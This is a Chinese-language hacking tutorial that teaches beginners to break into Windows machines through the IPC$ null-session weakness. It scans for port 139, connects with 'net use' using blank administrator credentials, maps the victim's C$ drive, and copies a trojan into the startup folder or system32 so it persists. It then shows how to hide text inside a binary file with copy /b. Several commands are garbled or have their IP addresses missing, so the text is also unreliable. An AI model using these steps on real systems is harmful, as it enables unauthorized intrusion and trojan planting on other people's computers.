文档介绍:[ 灌水] 教你如何利用 IPC $漏洞入侵"高手勿进!~新手请进!~" 首先我用局网里的一台存在IPC$漏洞的电脑给大家进行一次IPC$经典模式入侵的演示!~ 看我用X_SCAN扫到了一台开放139端口并且ADMINISTRATOR用户密码为空的电脑!~ 当然大家也可以用IPCSCAN扫, 这样速度会更快! ~OK ! ~下面开始入侵首先和对方建立IPC$连接: net use \\\ipc\$ "" /user:"administrator" net use \\IP\ipc$ "" /user:"" ( 一定要注意: 这一行命令中包含了 3 个空格) net use \\IP\ipc$ " 密码" /user:" 用户名"( 同样有 3 个空格) view \\IP 这个命令看一下对方的共享情况 OK!~成功!~新手注意了,这里密码为空,所以"" /user:"administrator" 这里我就只打两个引号! ~如果对方有密码的话, 就需要在引号中输入密码即可! ~OK ! ~现在我们可以 use x: \\\c\$ 来映射对方的硬盘! net use z: \\IP\c$ " 密码" /user:" 用户名"( 即可将对方的 c 盘映射为自己的 z 盘其他盘类推) 已经和目标建立了 ipc$ ,则可以直接用 IP+ 盘符+$ 访问, use z: \\IP\c$ net use c: /del 删除映射的 c盘, use * /del 删除全部, 会有提示要求按 y 确认删除一个 ipc$ use \\IP\ipc$ /del 看成功了, 不过权限是GUEST权限, 有复制, 粘贴权限! ~现在我们可以传一个木马, 把他复制到 C:\Documents and Settings\All Users\ 「开始」菜单\ 程序\ 启动中,如果对方机器从启之后木马会随系统自动启动的! ~这个方法由于要等, 所以我这里就不演示了! ~现在我就直接COPY一个木马到对方的C盘的WINNT\SYSTEM32目录下! ~OK , CO PY成功!~命令如下: copy d:\muniu \\\c\$\winnt\system32 copy c:\ \ip\***$ 意思是复制 到对方 IP 下的*** 下 copy \ip\***$\ c:\ 意思是复制对方*** 文件至本地 c:\ copy 将一个文本文件合并到一个非文本文件中,实现隐藏秘密的效果 copy + 看到了吗复制成功了,合并后的文件我给他命名为 SKY 了,现在大家看看效果,看上去没有什么区别,但是我们记事本打开看看就不同了看到了吧,最下面的那些内容是 里的内容, 小提示:其中参数/b 指定以二进制格式复制、合并文件; 参数/a 指定以 ASCII 格式复制、合并文件。这里要注意文件的顺序,二进制格式的文件应放在加号前,文本格式的文件放在加号后。有一点要提醒大家: 就是这个文本文件的前面最好至少空 3行,这样它头部的内容就不易丢失。 Copy +